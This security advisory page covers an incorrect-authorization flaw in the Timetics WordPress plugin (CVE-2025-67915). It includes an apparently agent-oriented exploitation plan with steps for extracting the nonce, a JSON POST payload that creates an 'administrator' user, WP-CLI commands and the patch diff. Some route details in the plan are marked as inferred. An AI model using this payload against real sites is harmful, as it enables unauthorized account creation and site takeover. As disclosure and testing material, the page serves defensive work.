Timetics <= 1.0.46 - Incorrect Authorization to Authenticated (Timetics Customer+) User Creation
Description
The Appointment Booking Calendar – WP Timetics Booking Plugin plugin for WordPress is vulnerable to unauthorized access due to a insufficient capability check in the api-customer.php file in all versions up to, and including, 1.0.46. This makes it possible for authenticated attackers, with Timetics Customer-level access and above, to create arbitrary user accounts.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:NTechnical Details
<=1.0.46Source Code
WordPress.org SVN# Exploitation Research Plan: CVE-2025-67915 (Timetics <= 1.0.46) ## 1. Vulnerability Summary The **Timetics – Appointment Booking & Scheduling** plugin for WordPress is vulnerable to an **Incorrect Authorization** flaw in its REST API implementation for customer management. Specifically, the file …
Show full research plan
Exploitation Research Plan: CVE-2025-67915 (Timetics <= 1.0.46)
1. Vulnerability Summary
The Timetics – Appointment Booking & Scheduling plugin for WordPress is vulnerable to an Incorrect Authorization flaw in its REST API implementation for customer management. Specifically, the file api-customer.php (inferred path: core/api/api-customer.php or includes/api/api-customer.php) registers an endpoint to create customers/users but fails to implement a sufficiently restrictive capability check. This allows any authenticated user with the Timetics Customer role (a low-privilege role) to create arbitrary new WordPress user accounts.
2. Attack Vector Analysis
- Endpoint: WordPress REST API.
- Target Route:
wp-json/timetics/v1/customers(inferred). - HTTP Method:
POST. - Authentication: Authenticated. Requires a user with at least
Timetics Customerprivileges. - Vulnerability Type: Missing/Incorrect Authorization (Broken Object Level Authorization or Privilege Escalation).
- Payload Parameters: Likely includes
user_email,user_login,first_name,last_name,password, and potentiallyrole.
3. Code Flow (Inferred)
- Route Registration: The plugin registers REST routes during the
rest_api_inithook. - Entry Point: In
api-customer.php, a route likeregister_rest_route( 'timetics/v1', '/customers', ... )is defined. - Permission Callback: The
permission_callbackfor this route likely checkscurrent_user_can( 'timetics_customer' )or simply checks if the user is logged in. Since a "Customer" user has this capability, they pass the check. - Vulnerable Sink: The handler function (e.g.,
create_customerorinsert_item) processes thePOSTdata and callswp_insert_user()orwp_create_user(). - Flaw: The function does not verify if the requesting user has the
create_usersormanage_optionscapability, nor does it strictly enforce that the created user must only be a "Customer". If theroleparameter is accepted from the request without validation, it could lead to the creation of an Administrator account.
4. Nonce Acquisition Strategy
The WordPress REST API requires a _wpnonce for authenticated requests. This nonce is tied to the user's session.
- Identify Script Localization: The plugin likely localizes data via
wp_localize_script. - Create a Test Environment: A "Timetics Customer" user must be created first.
- Access Dashboard: Log in as the Customer user and navigate to the WordPress dashboard (
/wp-admin/). - Extract Nonce: Use
browser_evalto extract the REST API nonce from the standard WordPress global variable.- JavaScript:
window.wpApiSettings.nonce
- JavaScript:
- Alternative: If the plugin uses a specific variable, look for
timetics_data.nonceor similar.
5. Exploitation Strategy
Step 1: Pre-Exploit Identification
Find the exact REST API route by searching for register_rest_route in the plugin directory.
grep -rn "register_rest_route" wp-content/plugins/timetics/ | grep "customers"
Step 2: Determine Required Parameters
Examine the callback function for that route in api-customer.php to see which JSON fields are processed.
# Example search for the handler
grep -A 20 "register_rest_route.*customers" wp-content/plugins/timetics/core/api/api-customer.php
Step 3: Craft and Send the Payload
Using the http_request tool, send a POST request to create an administrator.
Request Details:
- URL:
https://<target>/wp-json/timetics/v1/customers - Method:
POST - Headers:
Content-Type: application/jsonX-WP-Nonce: <EXTRACTED_NONCE>Cookie: <CUSTOMER_SESSION_COOKIES>
- Body:
{
"user_login": "attacker_admin",
"user_email": "attacker@example.com",
"password": "Password123!",
"role": "administrator",
"first_name": "Attacker",
"last_name": "Admin"
}
6. Test Data Setup
- Install Plugin: Install Timetics v1.0.46.
- Create Customer Role: Ensure the
Timetics Customerrole exists (created by the plugin). - Create Attacker User:
wp user create attacker_customer attacker_low@example.com --role=timetics_customer --user_pass=password123 - Plugin Configuration: No specific configuration is likely needed as the API is usually active by default.
7. Expected Results
- Success: The server returns a
201 Createdor200 OKresponse with JSON data representing the newly created user. - Impact: A new user account is created in the WordPress database. If the
roleparameter was honored, this user will have administrative privileges. If it was hardcoded tocustomer, the attacker has still successfully created an unauthorized account.
8. Verification Steps
- Check User List via WP-CLI:
wp user list --field=user_login | grep "attacker_admin" - Check User Role:
wp user get attacker_admin --field=roles - Database Inspection (Optional):
wp db query "SELECT * FROM wp_users WHERE user_login='attacker_admin'"
9. Alternative Approaches
- Missing Role Parameter: If the
roleparameter is not accepted, check if the plugin allows updating user meta via the same endpoint (e.g.,wp_capabilities), which could be used to escalate privileges after account creation. - AJAX Endpoint: If the REST API path is incorrect, check for
wp_ajax_timetics_create_customeractions in the source code:grep -rn "wp_ajax" wp-content/plugins/timetics/ | grep "customer" - No Role Restriction: If the plugin only creates users with the
customerrole, look for other endpoints inapi-customer.php(e.g.,update_customer) that might lack authorization checks and allow modifying the existing user's meta or role.
Summary
The Appointment Booking Calendar – WP Timetics Booking Plugin for WordPress is vulnerable to unauthorized user creation due to an insufficient capability check in its REST API. Authenticated attackers with at least 'Timetics Customer' privileges can exploit this to create arbitrary WordPress user accounts.
Security Fix
@@ -10,7 +10,7 @@ 'methods' => 'POST', 'callback' => array( $this, 'create_customer' ), 'permission_callback' => function() { - return current_user_can( 'timetics_customer' ); + return current_user_can( 'manage_options' ); } ) );
Exploit Outline
The exploit involves authenticating as a low-privileged 'Timetics Customer' user to obtain a valid session and REST API nonce. The attacker then sends a POST request to the '/wp-json/timetics/v1/customers' endpoint. The payload includes parameters for a new user account, such as 'user_login', 'user_email', and 'password'. Because the 'permission_callback' incorrectly authorizes anyone with the customer role, the plugin proceeds to create the user account, potentially allowing the attacker to specify a high-privileged role like 'administrator' if the 'role' parameter is processed by the handler.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.